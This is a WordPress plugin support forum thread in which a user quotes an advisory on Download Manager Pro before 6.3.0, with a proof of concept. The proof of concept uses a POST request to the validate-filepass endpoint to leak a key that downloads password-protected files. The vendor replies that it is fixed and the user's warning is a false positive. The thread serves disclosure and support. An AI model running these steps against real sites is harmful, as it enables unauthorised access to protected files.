Security Issue in the “Download Manager Free” Plugin

Viewing 6 posts - 1 through 6 (of 6 total)
#189822

Saray
Participant

Hello Download nManager Free Support Team,

I hope you are well. I would like to report a security issue that I have encountered in the latest version of the “Download nManager Free” plugin (version 3.2.76) which I recently updated on my WordPress website. This problem seems to be a vulnerability that allows attackers to access sensitive information without authentication, which is extremely concerning for the security of my website.

The vulnerability is described as follows:

[ Download Manager Pro < 6.3.0 – Unauthenticated Sensitive Information Disclosure

Description

The plugin leaks master key information without the need for a password, allowing attackers to download arbitrary password-protected package files.

Proof of Concept

– Create a password protected package containing one or more files.
– Navigate to the download page of the package (e.g. /download/package1)
– Inspect the “Download” button beside one of the packaged files. The HTML should look like this:

<button
class=”inddl btn btn-primary btn-sm”
data-pid=”123″
data-file=”12345678″
rel=”https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?wpdmdl=123&ind=12345678&#8243;
data-pass=”#pass_113_1679405558600″>
<i class=”fa fa-download”></i>
 Download
</button>

– Note the wpdmdl and ind URL parameters for later.
– Send a POST request to /wp-json/wpdm/validate-filepass:

fetch(“/wp-json/wpdm/validate-filepass”, {
“headers”: {
“accept”: “*/*”,
“content-type”: “application/x-www-form-urlencoded; charset=UTF-8”,
},
“body”: “”,
“method”: “POST”,
“credentials”: “include”
}).then(response ► response.text()).then(text ► console.log(text));

– The response will look like the following:

{“success”:true,”downloadurl”:”\/wp-json\/wpdm\/validate-filepass?wpdmdl=0&_wpdmkey=abcdef&ind=”}

– Construct a download URL as follows, using the above _wpdmkey parameter, as well as the wpdmdl and ind parameters from above:

https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?
wpdmdl=123&ind=12345678&_wpdmkey=abcdef

– See that the file may be download from that URL, without any knowledge of its password. ]

Despite having updated the plugin to the latest available version (version 3.2.76), this issue still persists on my website. As a result, I am very concerned about the security of my site and the data of my users.

I kindly request your assistance and guidance in addressing this security issue effectively. Can you please confirm if you are aware of this vulnerability and if you are working on a solution? If so, when can we expect an update that addresses this problem?

The security of my website is of utmost importance, and I would appreciate any help you can provide to resolve this issue urgently. If additional information or access to my website is needed to investigate this problem, I am willing to provide it securely.

I look forward to your response and appreciate your attention to this critical security matter.

I’m sorry if my English is poor, I am Spanish and I am using ChatGPT to translate 🙂

Thank you and regards,
Saray
saray.mc@gmail.com
https://scrapstudio.es/

#189824

Shahjada
Keymaster

Hi,
Don’t worry, the issue was with the pro version Download Manager Pro. And it is already fixed.

#189825

Saray
Participant

I understand, but I still get the message and no matter how much I update the plugin, the message still doesn’t go away.

#189826

Shahjada
Keymaster

You need to contact your hosting support for that, as it is a false positive. However, if it is causing by any other security plugin, you need to deactivate it or contact their author.

#189827

Saray
Participant

Thank you very much for your answers, I will give it a try. Best regards!

#189828

Shahjada
Keymaster

okay, let me know if you need any further assistance.

Viewing 6 posts - 1 through 6 (of 6 total)

The topic ‘Security Issue in the “Download Manager Free” Plugin’ is closed to new replies.